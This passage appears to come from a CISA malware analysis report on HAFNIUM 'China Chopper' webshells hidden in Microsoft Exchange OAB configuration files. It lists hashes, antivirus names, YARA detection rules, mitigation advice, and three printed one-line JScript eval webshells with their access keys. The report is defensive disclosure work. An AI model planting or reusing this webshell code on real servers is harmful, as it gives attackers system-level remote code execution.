           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["JHCwI01y8hvs"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "JHCwI01y8hvs" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 13. -

1e05b263cfea600f727614e58646a2ff6a4c89a4499e2410f23bf40c718a94d3

Tags

trojanwebshell

Details
Name ZyphzweO.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 e591908bd81d43464696dde547d45003
SHA1 a3bcf1bb8ed3073a0c9e6c5a87ad0aeab4001240
SHA256 1e05b263cfea600f727614e58646a2ff6a4c89a4499e2410f23bf40c718a94d3
SHA512 0fd37f12f880d5c5b8d2d32bbbc9ebcbb938a0cb81f942efd92ef328c2e6fa1647bf52c363469a3224d28adba65f6e1ccb47714be519933d7a9ca7304af5a597
ssdeep 24:ydxSzMaHVMNGs+rJdrde9j3yh91Qcu6jq6j71idfhphE5kaqt62E4ONF0qpenf:SxngffrdepiBJ95QZphEyfs4ONF0qI
Entropy 4.651647
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.35BB5C94
ClamAV Asp.Trojan.Webshell0321-9840176-0
ESET ASP/Webshell.DI trojan
Emsisoft Generic.ASP.WebShell.H.35BB5C94 (B)
Lavasoft Generic.ASP.WebShell.H.35BB5C94
McAfee Exploit-CVE2021-27065.d
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["gmetqypJ4TUw"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "gmetqypJ4TUw" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 14. -

e5451de048d7b9d6d8e699da7a10c38079eda4e6328580a8ba259a22eeaaa71d

Tags

trojanwebshell

Details
Name vyBcbDLQ.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 62281d112d8a17b49c2dc87bf2167b9f
SHA1 dc10dd5a896e0e343b8a8bf117beca4327b3c4ab
SHA256 e5451de048d7b9d6d8e699da7a10c38079eda4e6328580a8ba259a22eeaaa71d
SHA512 8dffc394bda02c2978d63b8c128efed7ed1b5e166a6bce93b6fac364fdd4dc49854602ab7ee22069598dc66b35844b3663e859a570328607eb19df80263c72f3
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaBmVMr6j71idfhphE5gIU0+62E4ONF0qVenf:kNrdepN1BXS0udM5QZphEQ0+s4ONF0q0
Entropy 4.643858
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.9ABE8BEE
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.9ABE8BEE (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.9ABE8BEE
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["21t3o5Rah6JI"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "21t3o5Rah6JI" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 15. -

Conclusion

The following MITRE ATT&CK tactics and techniques were observed during the analysis of these samples.



T1505.003 Server Software Component: Web Shell



Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.



T1190.000 Exploit Public-Facing Application



Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Central.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

This product is provided subject to this Notification and this Privacy & Use policy.